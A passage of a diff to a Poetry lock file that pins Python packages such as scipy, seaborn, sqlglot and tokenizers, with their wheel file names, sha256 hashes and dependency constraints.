+ {file = "scipy-1.10.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e7354fd7527a4b0377ce55f286805b34e8c54b91be865bac273f527e1b839019"},
+ {file = "scipy-1.10.1-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:4b3f429188c66603a1a5c549fb414e4d3bdc2a24792e061ffbd607d3d75fd84e"},
+ {file = "scipy-1.10.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1553b5dcddd64ba9a0d95355e63fe6c3fc303a8fd77c7bc91e77d61363f7433f"},
+ {file = "scipy-1.10.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4c0ff64b06b10e35215abce517252b375e580a6125fd5fdf6421b98efbefb2d2"},
+ {file = "scipy-1.10.1-cp310-cp310-win_amd64.whl", hash = "sha256:fae8a7b898c42dffe3f7361c40d5952b6bf32d10c4569098d276b4c547905ee1"},
+ {file = "scipy-1.10.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:0f1564ea217e82c1bbe75ddf7285ba0709ecd503f048cb1236ae9995f64217bd"},
+ {file = "scipy-1.10.1-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:d925fa1c81b772882aa55bcc10bf88324dadb66ff85d548c71515f6689c6dac5"},
+ {file = "scipy-1.10.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aaea0a6be54462ec027de54fca511540980d1e9eea68b2d5c1dbfe084797be35"},
+ {file = "scipy-1.10.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:15a35c4242ec5f292c3dd364a7c71a61be87a3d4ddcc693372813c0b73c9af1d"},
+ {file = "scipy-1.10.1-cp311-cp311-win_amd64.whl", hash = "sha256:43b8e0bcb877faf0abfb613d51026cd5cc78918e9530e375727bf0625c82788f"},
+ {file = "scipy-1.10.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5678f88c68ea866ed9ebe3a989091088553ba12c6090244fdae3e467b1139c35"},
+ {file = "scipy-1.10.1-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:39becb03541f9e58243f4197584286e339029e8908c46f7221abeea4b749fa88"},
+ {file = "scipy-1.10.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bce5869c8d68cf383ce240e44c1d9ae7c06078a9396df68ce88a1230f93a30c1"},
+ {file = "scipy-1.10.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:07c3457ce0b3ad5124f98a86533106b643dd811dd61b548e78cf4c8786652f6f"},
+ {file = "scipy-1.10.1-cp38-cp38-win_amd64.whl", hash = "sha256:049a8bbf0ad95277ffba9b3b7d23e5369cc39e66406d60422c8cfef40ccc8415"},
+ {file = "scipy-1.10.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cd9f1027ff30d90618914a64ca9b1a77a431159df0e2a195d8a9e8a04c78abf9"},
+ {file = "scipy-1.10.1-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:79c8e5a6c6ffaf3a2262ef1be1e108a035cf4f05c14df56057b64acc5bebffb6"},
+ {file = "scipy-1.10.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:51af417a000d2dbe1ec6c372dfe688e041a7084da4fdd350aeb139bd3fb55353"},
+ {file = "scipy-1.10.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b4735d6c28aad3cdcf52117e0e91d6b39acd4272f3f5cd9907c24ee931ad601"},
+ {file = "scipy-1.10.1-cp39-cp39-win_amd64.whl", hash = "sha256:7ff7f37b1bf4417baca958d254e8e2875d0cc23aaadbe65b3d5b3077b0eb23ea"},
+ {file = "scipy-1.10.1.tar.gz", hash = "sha256:2cf9dfb80a7b4589ba4c40ce7588986d6d5cebc5457cad2c2880f6bc2d42f3a5"},
+]
+
+[package.dependencies]
+numpy = ">=1.19.5,<1.27.0"
+
+[package.extras]
+dev = ["click", "doit (>=0.36.0)", "flake8", "mypy", "pycodestyle", "pydevtool", "rich-click", "typing_extensions"]
+doc = ["matplotlib (>2)", "numpydoc", "pydata-sphinx-theme (==0.9.0)", "sphinx (!=4.1.0)", "sphinx-design (>=0.2.0)"]
+test = ["asv", "gmpy2", "mpmath", "pooch", "pytest", "pytest-cov", "pytest-timeout", "pytest-xdist", "scikit-umfpack", "threadpoolctl"]
+
+[[package]]
+name = "seaborn"
+version = "0.12.2"
+description = "Statistical data visualization"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "seaborn-0.12.2-py3-none-any.whl", hash = "sha256:ebf15355a4dba46037dfd65b7350f014ceb1f13c05e814eda2c9f5fd731afc08"},
+ {file = "seaborn-0.12.2.tar.gz", hash = "sha256:374645f36509d0dcab895cba5b47daf0586f77bfe3b36c97c607db7da5be0139"},
+]
+
+[package.dependencies]
+matplotlib = ">=3.1,<3.6.1 || >3.6.1"
+numpy = ">=1.17,<1.24.0 || >1.24.0"
+pandas = ">=0.25"
+
+[package.extras]
+dev = ["flake8", "flit", "mypy", "pandas-stubs", "pre-commit", "pytest", "pytest-cov", "pytest-xdist"]
+docs = ["ipykernel", "nbconvert", "numpydoc", "pydata_sphinx_theme (==0.10.0rc2)", "pyyaml", "sphinx-copybutton", "sphinx-design", "sphinx-issues"]
+stats = ["scipy (>=1.3)", "statsmodels (>=0.10)"]
+
+[[package]]
+name = "six"
+version = "1.17.0"
+description = "Python 2 and 3 compatibility utilities"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+files = [
+ {file = "six-1.17.0-py2.py3-none-any.whl", hash = "sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274"},
+ {file = "six-1.17.0.tar.gz", hash = "sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81"},
+]
+
+[[package]]
+name = "soupsieve"
+version = "2.6"
+description = "A modern CSS selector implementation for Beautiful Soup."
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "soupsieve-2.6-py3-none-any.whl", hash = "sha256:e72c4ff06e4fb6e4b5a9f0f55fe6e81514581fca1515028625d0f299c602ccc9"},
+ {file = "soupsieve-2.6.tar.gz", hash = "sha256:e2e68417777af359ec65daac1057404a3c8a5455bb8abc36f1a9866ab1a51abb"},
+]
+
+[[package]]
+name = "sourcery"
+version = "1.28.0"
+description = "Magically refactor Python"
+optional = false
+python-versions = "*"
+files = [
+ {file = "sourcery-1.28.0-py2.py3-none-macosx_10_9_universal2.whl", hash = "sha256:ede0daff5ef75fc0a584f5c044c9bfa591905fa4ea6b7ec86210cdea149c6821"},
+ {file = "sourcery-1.28.0-py2.py3-none-manylinux1_x86_64.whl", hash = "sha256:b4a3c8d60ce1b912565082c33a1427a04b347d32bfeac0d706319cfff30706dd"},
+ {file = "sourcery-1.28.0-py2.py3-none-win_amd64.whl", hash = "sha256:a1f22a15d1731f14c283ec24f66d1efb143fe26ecc78e22a98d4ce76c463a969"},
+]
+
+[[package]]
+name = "sqlglot"
+version = "25.34.1"
+description = "An easily customizable SQL parser and transpiler"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "sqlglot-25.34.1-py3-none-any.whl", hash = "sha256:15099f8af832e6f5593fb92211d8b3f0810744ac0dc443fb70010fa38dc2562b"},
+ {file = "sqlglot-25.34.1.tar.gz", hash = "sha256:6952c083c4a8b8de3c09c10b262a03c6853071bd397f05759c08f1e2f3c683cb"},
+]
+
+[package.dependencies]
+sqlglotrs = {version = "0.3.0", optional = true, markers = "extra == \"rs\""}
+
+[package.extras]
+dev = ["duckdb (>=0.6)", "maturin (>=1.4,<2.0)", "mypy", "pandas", "pandas-stubs", "pdoc", "pre-commit", "python-dateutil", "pytz", "ruff (==0.7.2)", "types-python-dateutil", "types-pytz", "typing-extensions"]
+rs = ["sqlglotrs (==0.3.0)"]
+
+[[package]]
+name = "sqlglotrs"
+version = "0.3.0"
+description = "An easily customizable SQL parser and transpiler"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "sqlglotrs-0.3.0-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:20483ace62f943d50a7caeae57b434d1872f0dfeebc697f5e97a6851e3cef254"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:602feea94d9cfbba0d8b7cf40f144ce311f8c11f06b6a49638d6311b799ee578"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:27a64bf9770c683be0e345020674e52f04eacfccb74ef3529c0dfbaa25099509"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:09e6291cf28dbab1d4fedbe121e6db6bc5ca2fb4d1d60071b632ca4a543d5448"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac61397b933471149a0d4227736f8fa727f90b7ae370bfcef9afe7835e1177b8"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:93ba39a9ceafd999c9ccc0e53ff08d284915705db5a739b2ab66064e39010418"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:01e059b9ab5ccc98203dee2962e094c8d798cd50d94398740d514d1d5d480171"},
+ {file = "sqlglotrs-0.3.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c0493ac7c0ec58c1d1f13a931e98389a1dc6492f1ea1ad5b6edcf331ca2a1791"},
+ {file = "sqlglotrs-0.3.0-cp310-none-win32.whl", hash = "sha256:3b4cbdb225639615402e9fc79661255d9dea5b937d4196a9b499ffccb9560629"},
+ {file = "sqlglotrs-0.3.0-cp310-none-win_amd64.whl", hash = "sha256:a9f2ab2fa34d025439491f372c4c065aa921b7b73854647468218778b564f9eb"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:5c1b6b80f75676342268e46a47d07b406976a7c058d842d8729227c493540dba"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:b02f33c570d7a170279a67a66d30602857371aba5c5212af7f544cba41b0f48f"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5917dc3bba375d1bbb1ec8c72a317c138b95b1c7fcaba9aa5d71f8d2c88e86d"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:e7b7be5af42795481047561e2dc67bd20d06291daaa757ffaf0854bacbf280cc"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b678b19a3ae22068e6f0ec74a87db549d530f7642a9c954d79273eb0d579bb55"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:809394744715f2992d26e8f6eacddf5961864b1dbd778c9918b0bfc0b49176e3"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:26036563d4ca30750e44ab5eb1682d3585965df592425a6ecfdb03d154bb6393"},
+ {file = "sqlglotrs-0.3.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4718c07e136f94a85dc438d8392d868c14c88e8c27b1cd8a8bd7167c2318453e"},
+ {file = "sqlglotrs-0.3.0-cp311-none-win32.whl", hash = "sha256:99a6380100cb744a56ca24bddb62783b6f3cbddd50529183d95a426d3a9ce052"},
+ {file = "sqlglotrs-0.3.0-cp311-none-win_amd64.whl", hash = "sha256:c813e0620dd79573a08682551b90b0e408f52b84d7ffdbdb4cd5346101575239"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:b722831fd3de500d3c32169317878fede01880e3f1b6cfae926d60d6fbbde6b1"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:4eeedf2d77c9a44d75e641fa659da1cf69dfcdc27d4fe23d0ee45666122605ce"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:36878452de1c785dcf11792d9c9bd0810f523be02c23406dbeb6eef05c97e515"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:b3e2771b7c6ac9f3f871751e90f4d864c9c689622a3591d932497bd6f1475677"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5f14e501797e04711a13f766abb31871bc1044ec74e131cabebd7f7757f1cd3f"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:19bc0293fc586d7c0b5b210f011765cb4378e8f3d77ef93d1937bdd5971d6425"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cd5bdc463afe95f00bc9f52e412ea1d52bd958648428e552ecbab5b21d8f93c9"},
+ {file = "sqlglotrs-0.3.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:ecacb017d414b21b495e0868ca76b958dbae193ca0e158e0adcaa61b633c0315"},
+ {file = "sqlglotrs-0.3.0-cp312-none-win32.whl", hash = "sha256:48d510f5c9704899262ee6b2189eb8eb5639e6474e8141453e93fe10364bde2c"},
+ {file = "sqlglotrs-0.3.0-cp312-none-win_amd64.whl", hash = "sha256:b9f308732f12331f06c53fcb1d7c2b135a43aa22486b4c88c26d42710f329448"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-macosx_10_12_x86_64.whl", hash = "sha256:2ebdd93b3bcfa5f221957db355d88beea2ae238e388dc16876aa60d0904ae38c"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:3d642e2df4ec0016b493fc864ff0e94d90aad04dd350a1515e29e594a93e4ab0"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:780f2d3400af95976677d4f007e8eae58ff0da0c0191eeee2b722f4f3ca5eabf"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:8ff408440b8a8baa22581356057c49fba6de48fbbfc4c2b765edcfbaad06fb5e"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:efc31350a2f64821cc0c5c5297e8731c65e2fb4a276b2bd49b9873edab352a33"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:acb5e8cddccd70d4937a78bcad1b6a6e919e7d74ae867bad01313fb86ea9be14"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cabe76a38acad75c54f324dc43b38b591574ff679c6317dfb680f19d798d599d"},
+ {file = "sqlglotrs-0.3.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d0fac87cfbf070c32d36da98bb221c1594087f4fc1be07367749f6e28483c0df"},
+ {file = "sqlglotrs-0.3.0-cp37-none-win32.whl", hash = "sha256:b031e307b904c966b7820d332ada97876c39eddcbfef11f26841f2a19964878a"},
+ {file = "sqlglotrs-0.3.0-cp37-none-win_amd64.whl", hash = "sha256:eaf54eccab602ba0e029b42fecb495bd48e8f305ede7b049acad82a5cf4ce117"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:8fe9440a8d9cbe9e710d18be6ce624347b5054cf3e4d489243515e8f8af78ac0"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:74df14bfc1ca3fe5333e738a3af1423f1e1b6ce75ac7972cb891059752272eb1"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:af5e533c8f6a46c351bcc67a68ad1bab9f238cb1950483d5fee540ae1f18110a"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:1fbe17ea29952cd6e7e05afe7d34687b9e2e041ecf4a6aec3b1defc0b629b888"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a49ff2ce642e9157f701333bdcff378d9bd74a24a8f0eaf74fe76baf743b5f04"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9a8f65b664bd99d803e39e188a455503374c40b156aafb94a6843b29fa84d8a2"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d524351c38755009e13e67c2a8045cd1d6d3c86fa33b9a568560b2f2559a2c95"},
+ {file = "sqlglotrs-0.3.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e9aaec2773f2042d22ad0bd7c06d1b03cf2f98f584f7862d20ec2c303b16180d"},
+ {file = "sqlglotrs-0.3.0-cp38-none-win32.whl", hash = "sha256:8a913bb6f5588d0a670778f9b10124956a87203df41e166512d4574027aaaf6f"},
+ {file = "sqlglotrs-0.3.0-cp38-none-win_amd64.whl", hash = "sha256:dfbe3a404e201cdbbc0179da17074240ee4dd74bfc5ad75c9bcc3666c8435f7a"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:9aa376d3a0709746791c645858f7d59e32c0e489ee1fba82ca738901f7cd5181"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:490189f2c30e1461b9195d2e5417d6293e75f7a28917f41f2ef3689cc4539644"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2b5cc3bbcf9c38e1e9154f08ceebbbf92fd80f9efa0cc4e1513302f368db09cd"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:d205ed27aec521943f5aba28bc7f252adf8abbbfff88df2dfce4c4be6dbbbae9"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:66503cf6afeb39fd7187b0b4db3eac4e7f715756f8f2422f2308d72284f07d84"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:10bbd5f041a005a1e289039cedfdd5e1132ed621344e63cd9d3ba32026c48537"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:facac3f0136fcb3220493fd4df556f01c5c0b97fb4c5fafd9f344b9128fef72b"},
+ {file = "sqlglotrs-0.3.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b8b7e159803f17f827f691b5b818740c6f1b233588f8a2dc0a73391db14e5a54"},
+ {file = "sqlglotrs-0.3.0-cp39-none-win32.whl", hash = "sha256:d9a127109e27ccbd0bd3fd2fc66ceb25da00254d60e57985feab202df4e171dd"},
+ {file = "sqlglotrs-0.3.0-cp39-none-win_amd64.whl", hash = "sha256:dcd9300361a4c8a4719c340df669693fcff5fd6a04571378cf18c83d9b516e05"},
+ {file = "sqlglotrs-0.3.0.tar.gz", hash = "sha256:e77deb4ad2a94024e07ad9c1a15ad573b5503cacc9a948b0f5fd2d6df32156de"},
+]
+
+[[package]]
+name = "tokenizers"
+version = "0.20.3"
+description = ""
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "tokenizers-0.20.3-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:31ccab28dbb1a9fe539787210b0026e22debeab1662970f61c2d921f7557f7e4"},
+ {file = "tokenizers-0.20.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c6361191f762bda98c773da418cf511cbaa0cb8d0a1196f16f8c0119bde68ff8"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f128d5da1202b78fa0a10d8d938610472487da01b57098d48f7e944384362514"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:79c4121a2e9433ad7ef0769b9ca1f7dd7fa4c0cd501763d0a030afcbc6384481"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7850fde24197fe5cd6556e2fdba53a6d3bae67c531ea33a3d7c420b90904141"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b357970c095dc134978a68c67d845a1e3803ab7c4fbb39195bde914e7e13cf8b"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a333d878c4970b72d6c07848b90c05f6b045cf9273fc2bc04a27211721ad6118"},
+ {file = "tokenizers-0.20.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1fd9fee817f655a8f50049f685e224828abfadd436b8ff67979fc1d054b435f1"},
+ {file = "tokenizers-0.20.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:9e7816808b402129393a435ea2a509679b41246175d6e5e9f25b8692bfaa272b"},
+ {file = "tokenizers-0.20.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ba96367db9d8a730d3a1d5996b4b7babb846c3994b8ef14008cd8660f55db59d"},
+ {file = "tokenizers-0.20.3-cp310-none-win32.whl", hash = "sha256:ee31ba9d7df6a98619426283e80c6359f167e2e9882d9ce1b0254937dbd32f3f"},
+ {file = "tokenizers-0.20.3-cp310-none-win_amd64.whl", hash = "sha256:a845c08fdad554fe0871d1255df85772f91236e5fd6b9287ef8b64f5807dbd0c"},
+ {file = "tokenizers-0.20.3-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:585b51e06ca1f4839ce7759941e66766d7b060dccfdc57c4ca1e5b9a33013a90"},
+ {file = "tokenizers-0.20.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:61cbf11954f3b481d08723ebd048ba4b11e582986f9be74d2c3bdd9293a4538d"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ef820880d5e4e8484e2fa54ff8d297bb32519eaa7815694dc835ace9130a3eea"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:67ef4dcb8841a4988cd00dd288fb95dfc8e22ed021f01f37348fd51c2b055ba9"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ff1ef8bd47a02b0dc191688ccb4da53600df5d4c9a05a4b68e1e3de4823e78eb"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:444d188186eab3148baf0615b522461b41b1f0cd58cd57b862ec94b6ac9780f1"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:37c04c032c1442740b2c2d925f1857885c07619224a533123ac7ea71ca5713da"},
+ {file = "tokenizers-0.20.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:453c7769d22231960ee0e883d1005c93c68015025a5e4ae56275406d94a3c907"},
+ {file = "tokenizers-0.20.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4bb31f7b2847e439766aaa9cc7bccf7ac7088052deccdb2275c952d96f691c6a"},
+ {file = "tokenizers-0.20.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:843729bf0f991b29655a069a2ff58a4c24375a553c70955e15e37a90dd4e045c"},
+ {file = "tokenizers-0.20.3-cp311-none-win32.whl", hash = "sha256:efcce3a927b1e20ca694ba13f7a68c59b0bd859ef71e441db68ee42cf20c2442"},
+ {file = "tokenizers-0.20.3-cp311-none-win_amd64.whl", hash = "sha256:88301aa0801f225725b6df5dea3d77c80365ff2362ca7e252583f2b4809c4cc0"},
+ {file = "tokenizers-0.20.3-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:49d12a32e190fad0e79e5bdb788d05da2f20d8e006b13a70859ac47fecf6ab2f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:282848cacfb9c06d5e51489f38ec5aa0b3cd1e247a023061945f71f41d949d73"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:abe4e08c7d0cd6154c795deb5bf81d2122f36daf075e0c12a8b050d824ef0a64"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:ca94fc1b73b3883c98f0c88c77700b13d55b49f1071dfd57df2b06f3ff7afd64"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ef279c7e239f95c8bdd6ff319d9870f30f0d24915b04895f55b1adcf96d6c60d"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:16384073973f6ccbde9852157a4fdfe632bb65208139c9d0c0bd0176a71fd67f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:312d522caeb8a1a42ebdec87118d99b22667782b67898a76c963c058a7e41d4f"},
+ {file = "tokenizers-0.20.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f2b7cb962564785a83dafbba0144ecb7f579f1d57d8c406cdaa7f32fe32f18ad"},
+ {file = "tokenizers-0.20.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:124c5882ebb88dadae1fc788a582299fcd3a8bd84fc3e260b9918cf28b8751f5"},
+ {file = "tokenizers-0.20.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:2b6e54e71f84c4202111a489879005cb14b92616a87417f6c102c833af961ea2"},
+ {file = "tokenizers-0.20.3-cp312-none-win32.whl", hash = "sha256:83d9bfbe9af86f2d9df4833c22e94d94750f1d0cd9bfb22a7bb90a86f61cdb1c"},
+ {file = "tokenizers-0.20.3-cp312-none-win_amd64.whl", hash = "sha256:44def74cee574d609a36e17c8914311d1b5dbcfe37c55fd29369d42591b91cf2"},
+ {file = "tokenizers-0.20.3-cp313-cp313-macosx_10_12_x86_64.whl", hash = "sha256:e0b630e0b536ef0e3c8b42c685c1bc93bd19e98c0f1543db52911f8ede42cf84"},
+ {file = "tokenizers-0.20.3-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:a02d160d2b19bcbfdf28bd9a4bf11be4cb97d0499c000d95d4c4b1a4312740b6"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0e3d80d89b068bc30034034b5319218c7c0a91b00af19679833f55f3becb6945"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:174a54910bed1b089226512b4458ea60d6d6fd93060254734d3bc3540953c51c"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:098b8a632b8656aa5802c46689462c5c48f02510f24029d71c208ec2c822e771"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:78c8c143e3ae41e718588281eb3e212c2b31623c9d6d40410ec464d7d6221fb5"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2b26b0aadb18cd8701077362ba359a06683662d5cafe3e8e8aba10eb05c037f1"},
+ {file = "tokenizers-0.20.3-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:07d7851a72717321022f3774e84aa9d595a041d643fafa2e87fbc9b18711dac0"},
+ {file = "tokenizers-0.20.3-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:bd44e48a430ada902c6266a8245f5036c4fe744fcb51f699999fbe82aa438797"},
+ {file = "tokenizers-0.20.3-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:a4c186bb006ccbe1f5cc4e0380d1ce7806f5955c244074fd96abc55e27b77f01"},
